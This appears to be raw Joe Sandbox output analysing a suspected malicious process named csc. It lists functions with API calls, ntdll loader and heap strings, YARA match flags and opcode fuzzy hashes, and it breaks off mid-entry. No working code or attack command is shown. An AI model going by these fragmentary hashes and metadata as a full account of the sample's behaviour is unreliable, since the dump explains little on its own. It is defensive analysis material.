                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ae7408f40d94551d144952e7a5a9e21706bdf6bcaf420a0dfb4ad528fb8eb62b
                                                      • Instruction ID: 74e44e9c3ccdb3302010d49d6fc31416d8338aa3461540c0cdafccc6801f961e
                                                      • Opcode Fuzzy Hash: ae7408f40d94551d144952e7a5a9e21706bdf6bcaf420a0dfb4ad528fb8eb62b
                                                      • Instruction Fuzzy Hash: F690023620148802D914715C844474A4015C7D1301F99C411A5464658D8795C9A17231
                                                      Function 053E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 228 53e2b60-53e2b6c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2ed3cc2c9365a0bcbccaa2db6b051faa7489ab1c98cf1bc4d4576688f198611e
                                                      • Instruction ID: c4cd49c829c7ff6a46887b738bc9f75e4b9d3e68208e083b0b6c5eaf9c9d82ce
                                                      • Opcode Fuzzy Hash: 2ed3cc2c9365a0bcbccaa2db6b051faa7489ab1c98cf1bc4d4576688f198611e
                                                      • Instruction Fuzzy Hash: 69900266202400034909715C4454616801AC7E1201B95C021E2054590DC625C9A16235
                                                      Function 00413BF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 00413CA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 2E85-1J297$2E85-1J297
                                                      • API String ID: 1836367815-2292425170
                                                      • Opcode ID: 9ef06354370753566720ce0641794f4365d44dc161e8c80df766a471b4a826e7
                                                      • Instruction ID: fac5187bc1ebd0f532d1b5a8304cfaa8bfc79ea26e974f1851d4e8212ffd96c9
                                                      • Opcode Fuzzy Hash: 9ef06354370753566720ce0641794f4365d44dc161e8c80df766a471b4a826e7
                                                      • Instruction Fuzzy Hash: F8110A71E4421875DB119BA1DC02FDF7B7C9B81750F044256BE14BB2C1E6B8570687E9
                                                      Function 00413C1D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 16 413c1d-413c33 17 413c3c-413c91 call 42da93 call 4175d3 call 404e03 call 4243f3 16->17 18 413c37 call 42d083 16->18 27 413cb3-413cb8 17->27 28 413c93-413ca4 PostThreadMessageW 17->28 18->17 28->27 29 413ca6-413cb0 28->29 29->27
                                                      APIs
                                                      • PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 00413CA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 2E85-1J297$2E85-1J297
                                                      • API String ID: 1836367815-2292425170
                                                      • Opcode ID: b17fdb8d00fd9dbf1a21d31b589a756d2dd2dcbfb6b92dee265ea2bf3424112c
                                                      • Instruction ID: 7d834f13cbc57e5c5536fcf78db2658f70786329c2f6e1f07eabf56f68c91956
                                                      • Opcode Fuzzy Hash: b17fdb8d00fd9dbf1a21d31b589a756d2dd2dcbfb6b92dee265ea2bf3424112c
                                                      • Instruction Fuzzy Hash: AC11A571E4035876EB21AA91DC02FDF7B7C9F81754F04806AFE047B281E6B857068BE9
                                                      Function 00413C23 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 00413CA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 2E85-1J297$2E85-1J297
                                                      • API String ID: 1836367815-2292425170
                                                      • Opcode ID: 40ac6464cc02b0a17f22d6a0f9b39d8a91636f7c6e9eedb624e9262c98edf3cc
                                                      • Instruction ID: 1a282b7d84d996dac4ab3bb013e31c2a308f112e6a4d465b74d45ac7f165523c
                                                      • Opcode Fuzzy Hash: 40ac6464cc02b0a17f22d6a0f9b39d8a91636f7c6e9eedb624e9262c98edf3cc
                                                      • Instruction Fuzzy Hash: 51018871E4425876DB119B91DC02FDF7B7C9F41754F044066FE047B281E6B8570687E9
                                                      Function 0042B463 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 209 42b463-42b4a7 call 404e93 call 42c1b3 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,787DA667,00000007,00000000,00000004,00000000,00416EB6,000000F4,?,?,?,?,?), ref: 0042B4A2
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
                                                      • Instruction ID: 29216401f83c999bafc4889d1ef9cf5b8ded11cd2c7a16928c4b59d44ebfb468
                                                      • Opcode Fuzzy Hash: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
                                                      • Instruction Fuzzy Hash: BAE039712002047BD614EE59EC45FAB37ACEF89714F004419BA08A7282D670B9208BB5
                                                      Function 0042B413 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 204 42b413-42b457 call 404e93 call 42c1b3 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041DDDB,?,?,00000000,?,0041DDDB,?,?,?), ref: 0042B452
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
                                                      • Instruction ID: 221cd86b377e2f50623e42edb0e4ae3167af5ca3d055178b3f991e940f0c7b33
                                                      • Opcode Fuzzy Hash: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
                                                      • Instruction Fuzzy Hash: 53E039B12042047BD610EA99EC41FAB37ACEB88710F00801AB908A7282CA70BD208BB4
                                                      Function 0042B4B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 219 42b4b3-42b4ec call 404e93 call 42c1b3 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,00000000,?,?,80D9C676,?,?,80D9C676), ref: 0042B4E7
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 2d6778b99e822911c47e8daccf314cfd6029762112306eba4285f25f923e9aa8
                                                      • Instruction ID: 3649d5567d2ad1bba1c78f4e41195c4783f723823fa94b3f9b3b2a4a005bfd28
                                                      • Opcode Fuzzy Hash: 2d6778b99e822911c47e8daccf314cfd6029762112306eba4285f25f923e9aa8
                                                      • Instruction Fuzzy Hash: D2E04F356003147BD510AA5ADC45F9B775CDBC9714F40406AFA08A7281C6B079118BE4
                                                      Function 053E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 224 53e2c0a-53e2c0f 225 53e2c1f-53e2c26 LdrInitializeThunk 224->225 226 53e2c11-53e2c18 224->226
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bb149e5c4e69a021cd22fc6a6a43ef21321197aadd94c18d70e9f608d3c6d27e
                                                      • Instruction ID: 341c86e2032f11fc23d1957c292dabd37ce594d297f3e4faf2d2e2835887828b
                                                      • Opcode Fuzzy Hash: bb149e5c4e69a021cd22fc6a6a43ef21321197aadd94c18d70e9f608d3c6d27e
                                                      • Instruction Fuzzy Hash: ADB02B328014C0C5DE00E3204608B177910B7C0300F15C021E3030241E0338C0D0E271

                                                      Non-executed Functions

                                                      Function 05422349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2160512332
                                                      • Opcode ID: a5483d8a58159865bf10b0b14ae722420f1c2a66eb358a5521fcd06584d72862
                                                      • Instruction ID: 869091260d704b82147263346865d9564a7071fa328829dda4dfea6a2024ea91
                                                      • Opcode Fuzzy Hash: a5483d8a58159865bf10b0b14ae722420f1c2a66eb358a5521fcd06584d72862
                                                      • Instruction Fuzzy Hash: 4392BD7560C361ABE725CE24C884FABB7E9BB84710F84491EFA85D7350D7B0E844CB92
                                                      Function 053D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0541540A, 05415496, 05415519
                                                      • 8, xrefs: 054152E3
                                                      • Critical section debug info address, xrefs: 0541541F, 0541552E
                                                      • Address of the debug info found in the active list., xrefs: 054154AE, 054154FA
                                                      • corrupted critical section, xrefs: 054154C2
                                                      • Thread identifier, xrefs: 0541553A
                                                      • Invalid debug info address of this critical section, xrefs: 054154B6
                                                      • Critical section address, xrefs: 05415425, 054154BC, 05415534
                                                      • undeleted critical section in freed memory, xrefs: 0541542B
                                                      • Critical section address., xrefs: 05415502
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 054154CE
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 05415543
                                                      • double initialized or corrupted critical section, xrefs: 05415508
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 054154E2
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      • Opcode ID: 53587dd737d7360b12e58afd995dfc443643bfc6484e9853413c4a54f8a4f198
                                                      • Instruction ID: ce35617b574fed464d3de751a7ec9f81c305cea8f0734ff2f35a283c50f4837d
                                                      • Opcode Fuzzy Hash: 53587dd737d7360b12e58afd995dfc443643bfc6484e9853413c4a54f8a4f198
                                                      • Instruction Fuzzy Hash: D081BAB1A40358AFDB24CF94C845FEEFBB6BB88714F50455AF904B7280D3B1A941DBA4
                                                      Function 05439179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                      • API String ID: 0-3063724069
                                                      • Opcode ID: 00364367a5d5d01f2310e8aa5f31628f4377c1f67bf1a5f2f260fb1d07727eff
                                                      • Instruction ID: 432a95194140886187c4f86db3c3dc6c7e008a28993fa8af423b0767098b99b8
                                                      • Opcode Fuzzy Hash: 00364367a5d5d01f2310e8aa5f31628f4377c1f67bf1a5f2f260fb1d07727eff
                                                      • Instruction Fuzzy Hash: 0DD107B2909311AFD721DF54C846BEFB7E8AF88714F04096EFA84A7260D7B0DD448792
                                                      Function 0539D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • @, xrefs: 0539D313
                                                      • @, xrefs: 0539D0FD
                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0539D146
                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0539D262
                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0539D196
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0539D2C3
                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0539D0CF
                                                      • @, xrefs: 0539D2AF
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                      • API String ID: 0-1356375266
                                                      • Opcode ID: 17056ef015a90910dc9e34c870352c146dac2863a9e2b38eed9dfb1a4a66aee7
                                                      • Instruction ID: 44bc668e8232842f7013df3281642a16fa2315da589b905a2528040a2c3eb73d
                                                      • Opcode Fuzzy Hash: 17056ef015a90910dc9e34c870352c146dac2863a9e2b38eed9dfb1a4a66aee7
                                                      • Instruction Fuzzy Hash: 10A16DB1A083059FDB21DF65C485BABF7E9BB84715F004D2EF68997240E7B4D908CB52
                                                      Function 0539F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-523794902
                                                      • Opcode ID: 62b350966e75425dd0bab9958e2b02cc8eec0806558897c1cd16473f380c003b
                                                      • Instruction ID: 80ed0066223f6e3e62a246bb076b232026cfef4ed71204c2ab406dbb02fa8461
                                                      • Opcode Fuzzy Hash: 62b350966e75425dd0bab9958e2b02cc8eec0806558897c1cd16473f380c003b
                                                      • Instruction Fuzzy Hash: 474203B16183429FCB1ADF28C888B6ABBEAFF84704F04496DE586CB751D774D841CB52
                                                      Function 053BB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                      • API String ID: 0-122214566
                                                      • Opcode ID: 079721d77b95c23d59c5e69fece0c6569bc0a4d0596bcee46ba0fa518849eb7f
                                                      • Instruction ID: 1657f7e6d81973809be29263a612cb8b5fcb77d5f2ce7c5d76b3e48a435c1c50
                                                      • Opcode Fuzzy Hash: 079721d77b95c23d59c5e69fece0c6569bc0a4d0596bcee46ba0fa518849eb7f
                                                      • Instruction Fuzzy Hash: CAC11931B042159BEF25CB64C8A5BFEF7A5BF45300F144169EA069BA80EFF49D44D391
                                                      Function 0544F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                      • API String ID: 0-1745908468
                                                      • Opcode ID: e8a579a6bdc95475cc47c1f59bac6a1a8ba9b6bb379bca79a3088551e01b1de5
                                                      • Instruction ID: 6845903460b7f61a6a1be9de262c4b8446d8a0d9f9d55bb3f85887dcf67b5eb4
                                                      • Opcode Fuzzy Hash: e8a579a6bdc95475cc47c1f59bac6a1a8ba9b6bb379bca79a3088551e01b1de5
                                                      • Instruction Fuzzy Hash: CF910F31A44645EFEB19DF68D485AEABBF2FF49700F14809AE4459B361CB359885CF10
                                                      Function 0539645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • apphelp.dll, xrefs: 05396496
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 053F9A11, 053F9A3A
                                                      • LdrpInitShimEngine, xrefs: 053F99F4, 053F9A07, 053F9A30
                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 053F99ED
                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 053F9A2A
                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 053F9A01
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-204845295
                                                      • Opcode ID: ad9806cd13e717d733e3b88d78351cb31e20b40a910c5e8bee8934a9ea813285
                                                      • Instruction ID: e058b7997ab7ca205d4af83627a1fc8463d97d2f7a6dbb32fb829e8eacb764fb
                                                      • Opcode Fuzzy Hash: ad9806cd13e717d733e3b88d78351cb31e20b40a910c5e8bee8934a9ea813285
                                                      • Instruction Fuzzy Hash: 8D51A4712183049FDB29EF24D886FAB77E9FF84B44F00491DF5859B160DA70E904DBA2
                                                      Function 053D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 054121BF
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05412178
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0541219F
                                                      • RtlGetAssemblyStorageRoot, xrefs: 05412160, 0541219A, 054121BA
                                                      • SXS: %s() passed the empty activation context, xrefs: 05412165
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05412180
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      • API String ID: 0-861424205
                                                      • Opcode ID: 787b6753a4376dcd3dfe4ff6bc889d476cdeb7cd6e6241e92efafdfeef4a6cb8
                                                      • Instruction ID: d9fad9d1c99b57224f1a272f745b0fb465b573544ac5caa0ae7235a555216a63
                                                      • Opcode Fuzzy Hash: 787b6753a4376dcd3dfe4ff6bc889d476cdeb7cd6e6241e92efafdfeef4a6cb8
                                                      • Instruction Fuzzy Hash: 1A31373BF4432477E725DA969C86FAFB77AEF55A40F15005AFA05E7201D2B0AE00C6B4
                                                      Function 053DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 05418181, 054181F5
                                                      • Loading import redirection DLL: '%wZ', xrefs: 05418170
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 054181E5
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 053DC6C3
                                                      • LdrpInitializeProcess, xrefs: 053DC6C4
                                                      • LdrpInitializeImportRedirection, xrefs: 05418177, 054181EB
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-475462383
                                                      • Opcode ID: f52399603c1d52359498f41bdc2d83b5cb122db9d1c4d1dcf9509a8e92b3f6b8
                                                      • Instruction ID: 87e406a366472ed5e5b53342a035ed87516507e8ed3705584d3d934a0c7456cf
                                                      • Opcode Fuzzy Hash: f52399603c1d52359498f41bdc2d83b5cb122db9d1c4d1dcf9509a8e92b3f6b8
                                                      • Instruction Fuzzy Hash: 1A31E7767543559FC214EF28DD4AE6BBBE5EF84B10F04099CF8456B391EA20EC04C7A2
                                                      Function 053CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 054102E7
                                                      • RTL: Re-Waiting, xrefs: 0541031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 054102BD
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: df1fd090f5a032605dd7a51368a00d9da11f378bbac228d8232d2425e600fbee
                                                      • Instruction ID: c13f96113f40a522f5d2e0225a8c69b882605a773a5de81301d500cae6531088
                                                      • Opcode Fuzzy Hash: df1fd090f5a032605dd7a51368a00d9da11f378bbac228d8232d2425e600fbee
                                                      • Instruction Fuzzy Hash: 83E1C0306087419FD725CF28C889B6ABBE2BF84314F140A9EF596CB6D0D775E985CB42
                                                      Function 053C51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Kernel-MUI-Number-Allowed, xrefs: 053C5247
                                                      • Kernel-MUI-Language-SKU, xrefs: 053C542B
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 053C5352
                                                      • WindowsExcludedProcs, xrefs: 053C522A
                                                      • Kernel-MUI-Language-Allowed, xrefs: 053C527B
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: 0c4113e6ab5bd7af90d6132fb001434786977ba828e7846e2a9f54d8e9e823ab
                                                      • Instruction ID: d153c5188aba5eed9801abfa6e796934d6e38eed9b7c2f0fef038a1cf2c03025
                                                      • Opcode Fuzzy Hash: 0c4113e6ab5bd7af90d6132fb001434786977ba828e7846e2a9f54d8e9e823ab
                                                      • Instruction Fuzzy Hash: B0F14D72E14228EFCB15DF94C984EEEBBF9FF48650F1540AAE501E7250E774AE018B90
                                                      Function 053CD7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
